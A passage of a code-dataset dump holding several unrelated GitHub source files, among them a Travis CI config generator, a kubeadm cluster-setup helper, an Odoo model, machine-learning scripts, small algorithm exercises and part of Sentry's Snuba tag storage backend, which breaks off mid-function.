gen_travis_yaml(changed_projects):\n TRAVIS_CI_CFG_PATH = f'{Config.GIT_ROOT}/{Config.TRAVIS_CI_CFG_NAME}'\n\n if not changed_projects: return False\n changed_projects = sorted(changed_projects)\n stage_parts = []\n for project in changed_projects:\n yml_part = ' - script: ' if stage_parts else ' - stage: Build && Test && Deploy\\n script: '\n cmd_test = \"cmake --build . --target test\"\n commands = [\n f\"mkdir -p '{project.build_dir}'\",\n f\"pushd '{project.build_dir}'\",\n \"cmake -DGTEST_ROOT=/tmp/gtest-install ..\",\n \"cmake --build .\",\n cmd_test,\n \"cmake --build . --target package\",\n \"popd\",\n ]\n if not project.has_ut(): commands.remove(cmd_test)\n yml_part += ' && '.join(commands)\n yml_part += f\"\"\"\\n deploy:\n provider: script\n skip_cleanup: true\n script: bash scripts/deploy.sh {project.name} {project.build_dir}\n on:\n branch: main\n\"\"\"\n stage_parts.append(yml_part)\n\n with open(TRAVIS_CI_CFG_PATH, 'w') as f:\n f.write(gen_warning())\n f.write(\"\"\"language: cpp\nos: linux\ndist: focal\ncompiler: gcc\n\nbefore_install:\n - sudo add-apt-repository --yes ppa:ubuntu-toolchain-r/test\n - sudo apt-get update -qq\ninstall: \n - sudo apt-get install -qq g++-10\n - sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-10 90 --slave /usr/bin/g++ g++ /usr/bin/g++-10\n\nbefore_script:\n- sudo apt-get install libboost-test-dev -y\n- echo \"deb http://archive.ubuntu.com/ubuntu xenial main universe\" | sudo tee -a /etc/apt/sources.list\n- sudo apt-get update -qq\n- mkdir /tmp/gtest-src /tmp/gtest-build /tmp/gtest-install\n- git clone https://github.com/google/googletest /tmp/gtest-src\n- pushd /tmp/gtest-build && cmake -DCMAKE_INSTALL_PREFIX:PATH=/tmp/gtest-install /tmp/gtest-src && cmake --build . && cmake --build . 
--target install && popd\n\njobs:\n include:\n\"\"\")\n for part in stage_parts:\n f.write(part)\n f.write('\\n')\n f.write('\\n')\n return TRAVIS_CI_CFG_PATH\n\n\ndef commit_changes(yml):\n shell_exec(f'git add {yml}')\n if [1 for line in shell_exec('git status -uno --porcelain').split('\\n')]:\n yml_name = yml.split('/')[-1]\n return 0 == shell_exec(f'git commit -m \"[AUTO] regen {yml_name} before pushing\"', check_succ=False)[0]\n\n\ndef InitRepo():\n Config.create_working_dir_if_needed()\n Config.set_commit(Config.GIT_INIT_COMMIT)\n Config.set_state(False)\n with open(f'{Config.GIT_ROOT}/.git/hooks/pre-push', 'w') as f:\n f.write('''#!/bin/sh\n\n#\n# This file was generated by scripts/travis_yml_generator.py\n# Creation time point: {1}\n#\n\nif [ -f '{0}' ] ; then\n python3 '{0}'\nelse\n echo \"ERROR: can't find ['{0}']\"\n exit 1\nfi\n'''.format(Config.self_path(), datetime.datetime.now().isoformat()))\n\n\n\n\n\ndef main():\n Config.parse_args()\n Config.init_cfg()\n need_exit = False\n if Config.NEED_INIT: InitRepo(); need_exit = True\n if Config.SET_READY: Config.set_state(True); need_exit = True\n if Config.SAVE_COMMIT: Config.set_commit(Config.SAVE_COMMIT); need_exit = True\n if Config.IS_CONTINUE: need_exit = False\n if need_exit: return\n\n log_i('Getting last green commit')\n last_green = last_green_travis_build()\n\n log_i('Collect valued changes')\n changed = set()\n for line in shell_exec(f'git diff --name-only HEAD {last_green}').split('\\n'):\n file_root = line.split('/')[0]\n for prefix in Config.CTRL_PREFIXES:\n if file_root.startswith(prefix):\n changed.add(Project(file_root))\n break\n if changed:\n log_i('Generation new CI configuration for {} project(s)'.format(len(changed)))\n yml_name = gen_travis_yaml(changed)\n if commit_changes(yml_name):\n log_w('Disable \"git push\"')\n Config.set_state(False)\n\n if not Config.get_state():\n self_path = Config.self_path(is_abs=True)\n push_cmd = f'{self_path} --set_ready && git push\\n' if changed else ''\n log_e('''\n=======================================\n!!! 
'git push' command was disabled !!!\n=======================================\n\nLatest saved commit: {0}\n\nSet a new commit: --set_commit NEW_COMMIT\nEnable 'git push': --set_ready\n\nPossible commands:\n{1} --set_ready\n{1} --set_commit NEW_COMMIT\n{1} --set_ready --set_commit NEW_COMMIT\n{2}\n'''.format(last_green, self_path, push_cmd))\n        return 1\n\n    return 0\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n\n","repo_name":"zhaldak/otus-cpp","sub_path":"scripts/travis_yml_generator.py","file_name":"travis_yml_generator.py","file_ext":"py","file_size_in_byte":10472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14579442577","text":"import json\nimport random\n\nimport pytz\n\nfrom odoo import fields, models, api\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools import misc\n\n\nclass SaleOrder(models.Model):\n    _inherit = \"sale.order\"\n    test_field = fields.Text(string='Test')\n\n    _sql_constraints = [\n        ('check_test_field', 'CHECK(char_length(test_field) < 50)',\n         'Text length must be less than 50 characters!'),\n    ]\n\n    # If the user changes the quotation lines (products) or edits the Quotation Date,\n    # the value is updated on the fly to text in the \"Total - Date\" format\n    # (example value: 8,287.50 - 02/06/2022 16:33:53)\n    @api.onchange('date_order', 'order_line')\n    def _onchange_date_or_order(self):\n        if self.state == 'draft':\n            # convert self.date_order from the database time zone into the user's time zone\n            user_tz = pytz.timezone(self.env.user.tz)\n            converted_tz = pytz.utc.localize(self.date_order).astimezone(user_tz).strftime(\n                misc.DEFAULT_SERVER_DATETIME_FORMAT)\n            self.test_field = f'{json.loads(self.tax_totals_json)[\"amount_total\"]} - {converted_tz}'\n\n    # If the user manually enters text longer than 50 characters, the message\n    # 'Text length must be less than 50 characters!' is shown\n    @api.onchange('test_field')\n    def _onchange_test_field(self):\n        if self.test_field and len(self.test_field) > 50:\n            raise ValidationError(\"Text length must be less than 50 characters!\")\n\n    # By default, when the user creates a new quotation, the 'Test' field is filled with a random number.\n    @api.model\n    def create(self, vals):\n        vals['test_field'] = random.randrange(100)\n        return super().create(vals)\n","repo_name":"swish-ds/odoo-dstarovoitov","sub_path":"odoo_dstarovoitov/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"1662283156","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport re\n\nfrom Util.util import *\nfrom Kube.template import *\nfrom Util.log import Logger as logger\nfrom Kube import render\n\n\nclass KubeInit:\n    def __init__(self, conf):\n        self.conf = conf\n\n        self.init_config_file = os.path.join(conf.kube_init_path, \"init.yaml\")\n        self.kube_network_plugin = os.path.join(\n            conf.kube_init_path, \"kube-{}.yaml\".format(conf.kube_network_plugin_name)\n        )\n\n        self.kube_first_master_ipaddr = conf.master[\"servers\"][0]\n        self.kube_other_master_ipaddr = conf.master[\"servers\"][1:]\n        self.kube_node_ipaddr = conf.node[\"servers\"]\n\n        self.config_dir = os.path.join(self.conf.base_dir, \"Files/configs\")\n        self.plugin_dir = os.path.join(self.conf.base_dir, \"Files/plugin\")\n        self.script_dir = os.path.join(self.conf.base_dir, \"Files/scripts\")\n\n    def init_docker_env(self):\n        logger.get().info(\"Initializing the Docker environment\")\n        ips = self.conf.all_ip\n        init_script = 
os.path.join(self.script_dir, \"init_env.sh\")\n        target = os.path.join(self.conf.kube_init_path, \"init_env.sh\")\n        cmd = RUN_SHELL.format(FILE=target)\n        logger.get().debug(cmd)\n        for ip in ips:\n            Copy(self.conf.ssh_user, ip, init_script, target)\n            RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n    def init_master_node(self, ip=\"\"):\n        if ip == \"\":\n            ip = self.kube_first_master_ipaddr\n        logger.get().info(\"Initializing the primary master node, IP address {}\".format(ip))\n        render.fill_kubeadm_init_config(self.conf)\n        src = os.path.join(self.config_dir, \"init.yaml\")\n        logger.get().info(\"Rendering the kubeadm init file: {}\".format(src))\n        dest = self.init_config_file\n        Copy(self.conf.ssh_user, ip, src, dest)\n        cmd = INIT_ADMIN.format(CONFIG_PATH=dest)\n        logger.get().debug(cmd)\n        RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n    def sync_kubernetes_config(self, ips):\n        kube_config_dir = \"/etc/kubernetes/pki/\"\n        for ip in ips:\n            logger.get().info(\"Distributing the k8s PKI files to {}\".format(ip))\n            Copy(self.conf.ssh_user, ip, kube_config_dir, kube_config_dir, type=\"dir\")\n\n    def init_other_master_node(self):\n        self.sync_kubernetes_config(self.kube_other_master_ipaddr)\n        src = os.path.join(self.config_dir, \"init.yaml\")\n        dest = self.init_config_file\n        cmd = INIT_ADMIN.format(CONFIG_PATH=dest)\n        logger.get().debug(cmd)\n        for ip in self.kube_other_master_ipaddr:\n            logger.get().info(\"Initializing secondary master node: {}\".format(ip))\n            Copy(self.conf.ssh_user, ip, src, dest)\n            RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n    def init_network_plugin(self):\n        logger.get().info(\"Initializing the flannel network plugin\")\n        render.fill_network_plugin(self.conf)\n        cmd = DEPLOY_NETWORK_PLUGIN.format(PLUGIN_CONFIG=self.kube_network_plugin)\n        src = os.path.join(self.plugin_dir, \"kube-{}.yaml\".format(self.conf.kube_network_plugin_name))\n        dest = self.kube_network_plugin\n        logger.get().debug(cmd)\n        Copy(self.conf.ssh_user, self.kube_first_master_ipaddr, src, dest)\n        RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, cmd)\n\n    def join_cluster(self):\n        cmd = self.generic_admin_token()\n        logger.get().debug(cmd)\n        for ip in self.conf.node[\"servers\"]:\n            logger.get().info(\"Node {} joining the cluster\".format(ip))\n            RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n    def generic_admin_token(self):\n        logger.get().info(\"Generating the kubeadm join token\")\n        cmd = GENERIC_ADMIN_TOKEN.format(CONFIG_PATH=self.init_config_file)\n        logger.get().debug(cmd)\n        ret = RunCmdHostWithReturns(\n            self.conf.ssh_user, self.kube_first_master_ipaddr, cmd\n        )\n        return re.findall(r\"kubeadm.*\", ret)[0]\n\n    def cp_config(self):\n        logger.get().info(\"Generating the kubectl config file\")\n        RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, \"mkdir ~/.kube\")\n        RunCmdHost(\n            self.conf.ssh_user,\n            self.kube_first_master_ipaddr,\n            \"cp /etc/kubernetes/admin.conf ~/.kube/config\",\n        )\n\n    def check_cluster_status(self):\n        logger.get().info(\"Checking node status\")\n        RunCmdHost(\n            self.conf.ssh_user, self.kube_first_master_ipaddr, \"kubectl get node\"\n        )\n\n    def check_network_pods_status(self):\n        logger.get().info(\"Checking network plugin status\")\n        RunCmdHost(\n            self.conf.ssh_user,\n            self.kube_first_master_ipaddr,\n            \"kubectl get po -n kube-system | grep flannel\",\n        )\n\n    def reset(self, ips):\n        logger.get().info(\"Resetting the k8s environment\")\n        RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, \"rm -fr ~/.kube\")\n        for ip in ips:\n            RunCmdHost(self.conf.ssh_user, ip, \"kubeadm reset -f\")\n\n    def remove_taint(self):\n        cmd = \"kubectl taint nodes {} node-role.kubernetes.io/master-\"\n        for i in range(len(self.kube_other_master_ipaddr)):\n            node = \"%s%02d\" % (self.conf.node[\"server_name_prefix\"], i + 2)\n            
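# str.format() consumes the '{}' placeholder, so a fresh command must be\n            # derived from the template on every iteration rather than reformatting\n            # the already-formatted string.\n            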
logger.get().info(\"Removing the taint on {}\".format(node))\n            full_cmd = cmd.format(node)\n            logger.get().debug(full_cmd)\n            RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, full_cmd)\n","repo_name":"liyehaha/test-k","sub_path":"Kube/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"226280456","text":"import collections\n\n\nclass Solution(object):\n    def numPairsDivisibleBy60(self, time):\n        \"\"\"\n        :type time: List[int]\n        :rtype: int\n        \"\"\"\n        remainders = collections.defaultdict(int)\n        ret = 0\n        for t in time:\n            if t % 60 == 0:\n                ret += remainders[0]\n            else:\n                ret += remainders[60-t%60]\n            remainders[t%60] += 1\n        return ret\n","repo_name":"danieljbae/leetcode_archive","sub_path":"concepts/Arrays/q1010_PairsofSongsWithTotalDurations.py","file_name":"q1010_PairsofSongsWithTotalDurations.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34907234581","text":"import os\nimport nltk\nnltk.download('punkt')\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\n\nimport numpy as np\n\nimport tensorflow as tf\nimport random\nimport json\n\n# Get the path to the current directory\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n# Load the model and words/labels\nmodel_path = os.path.join(dir_path, 'model.h5')\nmodel = tf.keras.models.load_model(model_path)\n\nwith open(os.path.join(dir_path, 'intents.json')) as file:\n    data = json.load(file)\n\nwords = []\nlabels = []\ndocs_x = []\ndocs_y = []\n\n# Loop through each intent and tokenize the words\nfor intent in data['intents']:\n    for pattern in intent['patterns']:\n        # Tokenize each word in the pattern\n        tokenized_words = nltk.word_tokenize(pattern)\n        words.extend(tokenized_words)\n        docs_x.append(tokenized_words)\n        docs_y.append(intent['tag'])\n        if intent['tag'] not in labels:\n            labels.append(intent['tag'])\n\n# Stem and sort the words\nwords = [stemmer.stem(w.lower()) for w in words if w != '?']\nwords = sorted(list(set(words)))\nlabels = sorted(labels)\n\n# Generate a bag of words for the input\ndef bag_of_words(s, words):\n    bag = [0 for _ in range(len(words))]\n\n    s_words = nltk.word_tokenize(s)\n    s_words = [stemmer.stem(word.lower()) for word in s_words]\n\n    for se in s_words:\n        for i, w in enumerate(words):\n            if w == se:\n                bag[i] = 1\n\n    return np.array(bag)\n\n# Start the chat loop\nwhile True:\n    user_input = input(\"You: \")\n    if user_input.lower() == 'quit':\n        break\n\n    # wrap the single bag-of-words vector in a batch dimension for Keras\n    results = model.predict(np.array([bag_of_words(user_input, words)]))\n    results_index = np.argmax(results)\n    tag = labels[results_index]\n\n    for intent in data['intents']:\n        if intent['tag'] == tag:\n            responses = intent['responses']\n\n    print(random.choice(responses))\n","repo_name":"Ephraim-blessing-mwereza/mental-health-chat-bot-v2","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"71426749160","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here are several helpful packages to load in\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\nimport nltk \nfrom nltk.corpus import stopwords\n#to remove HTML tags from the doc\nfrom bs4 import BeautifulSoup \n#removing numbers,punctuations,i.e regular expressions from the doc\nimport re\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split,StratifiedKFold\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score, f1_score\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import BernoulliNB\n\nimport os\nprint(os.listdir(\"../input\"))\n\ntrain_data = pd.read_csv(\"../input/labeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\ntrain_data.shape\ntrain_data.head(5)\n# view the first review\ntrain_data.review[0]\n# html tags and comments are removed and stored in sample1\n\nsample1 = BeautifulSoup(train_data.review[0],\"html.parser\")\n\n# using get_text() we can see only text in html doc\n\nprint(sample1.get_text())\n# a '^' within square brackets searches anything other than the one on it\n# hence here it matches everything from numbers and punctuations etc , leaving only the words\n\nletters_only = re.sub(\"[^a-zA-Z]\",\" \",sample1.get_text())\nprint(letters_only)\n# changing all the words to lowercase to create a bag of words later\n\nlower_case = letters_only.lower()\n\n# the whole doc is now split to create an array from which most common words called \"stop words\" will be removed\n\nwords = lower_case.split()\nimport nltk\nnltk.download('stopwords')\n\n# most common stopwords used in english language\n\nprint(stopwords.words(\"english\"))\n# removing stopwords from sample1 so that relevant words can be filtered out and stored in words\n\nwords = [w for w in words if w not in stopwords.words(\"english\")]\nprint(words)\n# the above code cleans only one review , let's make a function to clean all the reviews\ndef review_to_words(raw_review):\n #remove html using BeautifulSoup\n review_text = BeautifulSoup(raw_review,\"html.parser\").get_text()\n #removing raw letters,numbers,punctuations\n letters_only = re.sub(\"[^a-zA-Z]\",\" \",review_text)\n #creating an array , resolving whitespaces\n words = letters_only.lower().split()\n #create an array of stopwords so that we don't have to access corpus to search for a stopword\n stop = set(stopwords.words(\"english\"))\n #removing stopwords from the raw_review\n meaningful_words = [w for w in words if w not in stop]\n #return a string with only the words that are important\n return(\" \".join(meaningful_words))\n# finding the number of reviews\nnum_rev = train_data.review.size\nprint(num_rev)\n# storing all cleaned reviews in one place\n\ncleaned_rev = []\nfor i in range(num_rev):\n cleaned_rev.append(review_to_words(train_data.review[i]))\n# creating a function, vectorizer to convert the words into vectors\n\nvectorizer = CountVectorizer(analyzer=\"word\",\n preprocessor=None,\n stop_words=\"english\",\n max_features=5000)\n# converting reviews from text into features\n\ntrain_data_features = vectorizer.fit_transform(cleaned_rev)\n\n#change the classifier into array\n\ntrain_data_features = train_data_features.toarray()\nX = train_data_features\n\n#dependent variable,y will be 1 for positive and 0 for negative review\n\ny = train_data.sentiment \n# 25000 rows and 5000 features\n\nprint (X.shape) \nprint (y.shape) \n# splitting the training data into test and train\n\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.25,random_state=123)\n# Applying MultinomialNaiveBayes for classification 
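\n# Multinomial NB models per-class word-count distributions, which matches the\n# CountVectorizer bag-of-words features built above; Bernoulli NB, tried further\n# down, models binary word presence/absence instead.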
\n\nnaive = MultinomialNB()\nclassifier = naive.fit(X_train,y_train)\npredict = classifier.predict(X_test)\n\nfrom sklearn.metrics import confusion_matrix\n\n# confusion_matrix expects (y_true, y_pred)\ncm = confusion_matrix(y_test,predict)\ncm\naccuracy = cm.trace()/cm.sum()\nprint(accuracy)\n# loading test data for prediction\n\ntest_data = pd.read_csv(\"../input/testData.tsv\",header=0, delimiter=\"\\t\", quoting=3)\ntest_data.head(2)\n# preprocessing of test data\n\nnumber_of_review = len(test_data[\"review\"])\nprint(number_of_review)\n\n# removing all punctuations,numbers, etc from test data\n\nclean_review =[]\nfor i in range(number_of_review):\n    clean_review.append(review_to_words(test_data[\"review\"][i]))\n\n# converting text into features and features to array;\n# use transform (not fit_transform) so the test reviews are encoded with the\n# same vocabulary the classifier was trained on\n\ntest_data_features = vectorizer.transform(clean_review)\ntest_data_features = test_data_features.toarray()\n\n# predicting test data by the classifier\n\ny_pred_M = classifier.predict(test_data_features)\n\n# accuracy and f1 score on the held-out validation split\n# (the Kaggle test set is unlabeled, so it cannot be scored directly)\n\nprint(accuracy_score(y_test,predict))\nprint(f1_score(y_test,predict))\n# Applying BernoulliNaiveBayes Classifier to training data\n\nBernNB = BernoulliNB(binarize = 0.01)\nBernNB.fit(X_train,y_train)\nprint(BernNB)\n\n# applying the classifier to the validation split and the test data\n\ny_val_B = BernNB.predict(X_test)\ny_pred_B = BernNB.predict(test_data_features)\nprint (accuracy_score(y_test,y_val_B))\nprint (f1_score(y_test,y_val_B))\n\n# since accuracy and f1_score are slightly higher in MultinomialNaiveBayes,\n# predicted value of that model is used for the submission.\n\n# Copy the results to a pandas dataframe with an \"id\" column and\n# a \"sentiment\" column\n\noutput = pd.DataFrame( data={\"id\":test_data[\"id\"], \"sentiment\": y_pred_M} )\n\n# Use pandas to write the comma-separated output file\n\noutput.to_csv( \"Bag_of_Words_model.csv\", index=False, quoting=3 )","repo_name":"aorursy/new-nb-3","sub_path":"ganguly069_bag-of-words-with-naive-bayes.py","file_name":"ganguly069_bag-of-words-with-naive-bayes.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38442943605","text":"from django.conf import settings\nfrom django_cron import CronJobBase, Schedule\n\n\nclass TrainModel(CronJobBase):\n    RUN_EVERY_MINS = 1 if settings.DEBUG else 60\n\n    schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\n    code = 'Update the Training Model'\n\n    def do(self):\n        exec(open(\"matchability_lib/matcha.py\").read(), globals())\n","repo_name":"felixsimard/aiesecmatchability","sub_path":"matchability_api/matchability_api/api/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"2151607604","text":"class TreeNode:\n    def __init__(self):\n        self.data = None\n        self.left = None\n        self.right = None\n\n\nroot = None\nnameAry = ['블랙핑크', '레드벨벳', '마마무', '에이핑크', '걸스데이', '트와이스', '잇지', '여자친구']\n\nnode = TreeNode()\nnode.data = nameAry[0]\nroot = node\n\nfor name in nameAry[1:]:\n    node = TreeNode()\n    node.data = name\n\n    current = root\n    while True:\n        if name < current.data:\n            if current.left is None:\n                current.left = node\n                break\n            current = current.left\n        else:\n            if current.right is None:\n                current.right = node\n                break\n            current = current.right\n\nprint(\"Binary search tree construction complete\")\n\ndelete_name = input(\"Group name to delete: \")\n\ncurrent = root\nparent = None\nwhile True:\n    if delete_name == current.data:\n\n        if current.left is None and current.right is None:\n            if parent.left is current:\n                parent.left = None\n            
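# otherwise the leaf hangs off the parent's right side\n            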
else:\n                parent.right = None\n            del current\n        elif current.left is not None and current.right is None:\n            if parent.left is current:\n                parent.left = current.left\n            else:\n                parent.right = current.left\n            del current\n        elif current.left is None and current.right is not None:\n            # this branch has to relink the right child; reusing current.left\n            # here (as the left-child branch does) would lose the subtree\n            if parent.left is current:\n                parent.left = current.right\n            else:\n                parent.right = current.right\n            del current\n        print(f\"{delete_name} was deleted\")\n        break\n    elif delete_name < current.data:\n        if current.left is None:\n            print(f\"{delete_name} is not in the tree\")\n            break\n        parent = current\n        current = current.left\n    else:\n        if current.right is None:\n            print(f\"{delete_name} is not in the tree\")\n            break\n        parent = current\n        current = current.right\n\n\n","repo_name":"coliny123/Algorithm","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"14905249996","text":"from collections import Counter\nimport re\n\n\ndef letsCount(path):\n    \n    with open(path, \"r\") as f:\n        data = f.read()\n    \n    data = data.lower()\n    \n    data = re.sub(r\"[^\\w ]\", \"\", data)\n    \n    def Convert(tup, di):\n        for a, b in tup:\n            di.setdefault(a, []).append(b)\n        return di\n    \n    output_data = {}\n    \n    \n    words = data.split(\" \")\n    \n    filtered = Counter(words).most_common(30)\n    # print(filtered)\n    \n    Convert(filtered, output_data)\n    # print(output_data)\n    \n    \n    # driver\n    for words, count in output_data.items():\n        print (words, \":\", count)","repo_name":"SidLabs-Online/KeyWords_Parser_Py","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"33085399724","text":"from __future__ import absolute_import\n\nimport functools\nfrom collections import defaultdict\nfrom datetime import timedelta\nfrom dateutil.parser import parse as parse_datetime\nfrom django.utils import timezone\nimport six\n\nfrom sentry.tagstore import TagKeyStatus\nfrom sentry.tagstore.base import TagStorage\nfrom sentry.tagstore.exceptions import (\n    GroupTagKeyNotFound,\n    GroupTagValueNotFound,\n    TagKeyNotFound,\n    TagValueNotFound,\n)\nfrom sentry.tagstore.types import TagKey, TagValue, GroupTagKey, GroupTagValue\nfrom sentry.utils import snuba\nfrom sentry.utils.dates import to_timestamp\n\n\nSEEN_COLUMN = 'timestamp'\n\n\ntag_value_data_transformers = {\n    'first_seen': parse_datetime,\n    'last_seen': parse_datetime,\n}\n\n\ndef fix_tag_value_data(data):\n    for key, transformer in tag_value_data_transformers.items():\n        if key in data:\n            data[key] = transformer(data[key])\n    return data\n\n\nclass SnubaTagStorage(TagStorage):\n\n    def get_time_range(self, days=90):\n        \"\"\"\n        Returns the default (start, end) time range for querying snuba.\n        \"\"\"\n        # TODO this should use the per-project retention figure to limit\n        # the query to looking at only the retention window for the project.\n        end = timezone.now()\n        return (end - timedelta(days=days), end)\n\n    def __get_tag_key(self, project_id, group_id, environment_id, key):\n        start, end = self.get_time_range()\n        tag = 'tags[{}]'.format(key)\n        filters = {\n            'project_id': [project_id],\n            'environment': [environment_id],\n        }\n        if group_id is not None:\n            filters['issue'] = [group_id]\n        conditions = [[tag, '!=', '']]\n        aggregations = [['uniq', tag, 'unique_values']]\n\n        result = snuba.query(start, end, [], conditions, filters, aggregations,\n                             
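# with no groupby columns and a single aggregation, snuba.query returns a\n                             # bare scalar, which is why the result is compared to 0 below\n                             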
referrer='tagstore.__get_tag_key')\n if result == 0:\n raise TagKeyNotFound if group_id is None else GroupTagKeyNotFound\n else:\n data = {\n 'key': key,\n 'values_seen': result,\n }\n if group_id is None:\n return TagKey(**data)\n else:\n return GroupTagKey(group_id=group_id, **data)\n\n def __get_tag_keys(self, project_id, group_id, environment_id, limit=1000):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n }\n if group_id is not None:\n filters['issue'] = [group_id]\n aggregations = [['uniq', 'tags_value', 'values_seen']]\n\n result = snuba.query(start, end, ['tags_key'], [], filters,\n aggregations, limit=limit, orderby='-values_seen',\n referrer='tagstore.__get_tag_keys')\n\n if group_id is None:\n ctor = TagKey\n else:\n ctor = functools.partial(GroupTagKey, group_id=group_id)\n\n return set([ctor(key=key, values_seen=values_seen)\n for key, values_seen in six.iteritems(result) if values_seen])\n\n def __get_tag_value(self, project_id, group_id, environment_id, key, value):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n }\n if group_id is not None:\n filters['issue'] = [group_id]\n conditions = [[tag, '=', value]]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n data = snuba.query(start, end, [], conditions, filters, aggregations)\n if not data['times_seen'] > 0:\n raise TagValueNotFound if group_id is None else GroupTagValueNotFound\n else:\n data.update({\n 'key': key,\n 'value': value,\n })\n if group_id is None:\n return TagValue(**fix_tag_value_data(data))\n else:\n return GroupTagValue(group_id=group_id, **fix_tag_value_data(data))\n\n def __get_tag_values(self, project_id, group_id, environment_id, key):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n }\n if group_id is not None:\n filters['issue'] = [group_id]\n conditions = [[tag, '!=', '']]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, [tag], conditions, filters, aggregations,\n referrer='tagstore.__get_tag_values')\n\n if group_id is None:\n ctor = TagValue\n else:\n ctor = functools.partial(GroupTagValue, group_id=group_id)\n\n return set([ctor(key=key, value=value, **fix_tag_value_data(data))\n for value, data in result.items()])\n\n def get_tag_key(self, project_id, environment_id, key, status=TagKeyStatus.VISIBLE):\n assert status is TagKeyStatus.VISIBLE\n return self.__get_tag_key(project_id, None, environment_id, key)\n\n def get_tag_keys(self, project_id, environment_id, status=TagKeyStatus.VISIBLE):\n assert status is TagKeyStatus.VISIBLE\n return self.__get_tag_keys(project_id, None, environment_id)\n\n def get_tag_value(self, project_id, environment_id, key, value):\n return self.__get_tag_value(project_id, None, environment_id, key, value)\n\n def get_tag_values(self, project_id, environment_id, key):\n return self.__get_tag_values(project_id, None, environment_id, key)\n\n def get_group_tag_key(self, project_id, group_id, environment_id, key):\n return self.__get_tag_key(project_id, group_id, environment_id, key)\n\n def get_group_tag_keys(self, project_id, group_id, environment_id, limit=None):\n return self.__get_tag_keys(project_id, 
group_id, environment_id, limit=limit)\n\n def get_group_tag_value(self, project_id, group_id, environment_id, key, value):\n return self.__get_tag_value(project_id, group_id, environment_id, key, value)\n\n def get_group_tag_values(self, project_id, group_id, environment_id, key):\n return self.__get_tag_values(project_id, group_id, environment_id, key)\n\n def get_group_list_tag_value(self, project_id, group_id_list, environment_id, key, value):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': group_id_list,\n }\n conditions = [\n [tag, '=', value]\n ]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, ['issue'], conditions, filters, aggregations,\n referrer='tagstore.get_group_list_tag_value')\n\n return {\n issue: GroupTagValue(\n group_id=issue,\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for issue, data in six.iteritems(result)\n }\n\n def get_group_tag_value_count(self, project_id, group_id, environment_id, key):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': [group_id],\n }\n conditions = [[tag, '!=', '']]\n aggregations = [['count()', '', 'count']]\n\n return snuba.query(start, end, [], conditions, filters, aggregations,\n referrer='tagstore.get_group_tag_value_count')\n\n def get_top_group_tag_values(self, project_id, group_id, environment_id, key, limit=3):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': [group_id],\n }\n conditions = 